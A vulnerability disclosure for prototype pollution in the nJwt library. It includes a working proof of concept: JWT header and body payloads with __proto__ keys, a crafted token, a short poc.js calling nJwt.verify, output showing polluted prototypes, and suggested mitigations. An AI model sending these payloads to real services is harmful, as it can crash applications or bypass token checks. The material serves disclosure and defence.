[Security] Prototype Pollution in nJwt library

[chrisandoryan]

Prototype Pollution in nJwt library

Description

The nJwt library is susceptible to prototype pollution, particularly affecting the JwtHeader and JwtBody objects. These objects lack validation to ensure that attributes assigned to them don't resolve to the object prototype. The problem lies within the Parser.prototype.parse method, which is invoked when a user attempts to verify a JWT token using the nJwt.verify(token, signingKey) method.

By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object and its inheritance or bypass certain checks. This can be problematic if the software depends on the existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString, or valueOf).

Proof of Concept (PoC)

Create a new JWT token with header and body as follows:

JWT Header

{
  "typ": "JWT",
  "alg": "HS256",
  "__proto__": {
    "compact": null,
    "reservedKeys": ["typ", "random_gibberish"] // original: ["typ", "alg"]
  }
}

JWT Body

{
  "sub": 1,
  "scope": "user",
  "jti": "4cf58968-e553-4ebd-8d52-1407c654e8d6",
  "iat": 1713925867,
  "exp": 1713929467,
  "__proto__": {
    "compact": null,
    "toJSON": null,
    "polluted": true
  }
}

Resulting Token (Example)

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsIl9fcHJvdG9fXyI6eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsIl9fcHJvdG9fXyI6eyJjb21wYWN0IjpudWxsLCJyZXNlcnZlZEtleXMiOlsidHlwIiwicmFuZG9tX2dpYmJlcmlzaCJdfX19.eyJzdWIiOjEsInNjb3BlIjoidXNlciIsImp0aSI6ImJhZmIxNmNlLTIwZDYtNGNkNy05NDgzLTY1YTA5NThhOGU2NCIsImlhdCI6MTcxMzk0NTM3OSwiZXhwIjoxNzEzOTQ4OTc5LCJfX3Byb3RvX18iOnsiY29tcGFjdCI6bnVsbCwidG9KU09OIjpudWxsLCJwb2xsdXRlZCI6dHJ1ZX19.0XBjesxGkSMBjI5_LrwobgoyG-VXI2HCXTGVU-fLFuk

Then, supply the token to be verified with nJwt.verify() function, for example:

// poc.js

var nJwt = require('njwt');

var secureRandom = require('secure-random');
var signingKey = secureRandom(256, {type: 'Buffer'});

var token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsIl9fcHJvdG9fXyI6eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsIl9fcHJvdG9fXyI6eyJjb21wYWN0IjpudWxsLCJyZXNlcnZlZEtleXMiOlsidHlwIiwicmFuZG9tX2dpYmJlcmlzaCJdfX19.eyJzdWIiOjEsInNjb3BlIjoidXNlciIsImp0aSI6ImJhZmIxNmNlLTIwZDYtNGNkNy05NDgzLTY1YTA5NThhOGU2NCIsImlhdCI6MTcxMzk0NTM3OSwiZXhwIjoxNzEzOTQ4OTc5LCJfX3Byb3RvX18iOnsiY29tcGFjdCI6bnVsbCwidG9KU09OIjpudWxsLCJwb2xsdXRlZCI6dHJ1ZX19.0XBjesxGkSMBjI5_LrwobgoyG-VXI2HCXTGVU-fLFuk";

nJwt.verify(token, signingKey);

As a result, the JwtHeader and JwtBody attributes will be polluted as follows:

JWT Header

[JWT Header] Attribute Before Pollution:  JwtHeader { typ: 'JWT', alg: 'HS256' }
[JWT Header] Prototype Before Pollution:  { reservedKeys: [ 'typ', 'alg' ], compact: [Function: compact] }

[JWT Header] Attribute After Pollution:  { typ: 'JWT', alg: 'HS256' }
[JWT Header] Prototype After Pollution:  { compact: null, reservedKeys: [ 'typ', 'random_gibberish' ] }

JWT Body

[JWT Body] Attribute Before Pollution:  JwtBody {}
[JWT Body] Prototype Before Pollution:  { toJSON: [Function (anonymous)], compact: [Function: compact] }

[JWT Body] Attribute After Pollution:  {
  sub: 1,
  scope: 'user',
  jti: 'bafb16ce-20d6-4cd7-9483-65a0958a8e64',
  iat: 1713945379,
  exp: 1713948979
}
[JWT Body] Prototype After Pollution:  { compact: null, toJSON: null, polluted: true }

Impact

An arbitrary user can override existing attributes with ones that have incompatible types, which may lead to a crash, or bypass certain checks via attribute modification, for example, overriding the JwtHeader.prototype.reservedKeys arrays. It might also be possible to create polluted attributes on every object inheriting from JwtBody and JwtHeader objects.

Mitigation

This issue can be fixed by freezing the prototype, or by implementing validation to check for prototype keywords (__proto__, constructor and prototype), where if it exists, the function denies merging it into JwtBody and JwtHeader object, thus preventing the prototype pollution vulnerability.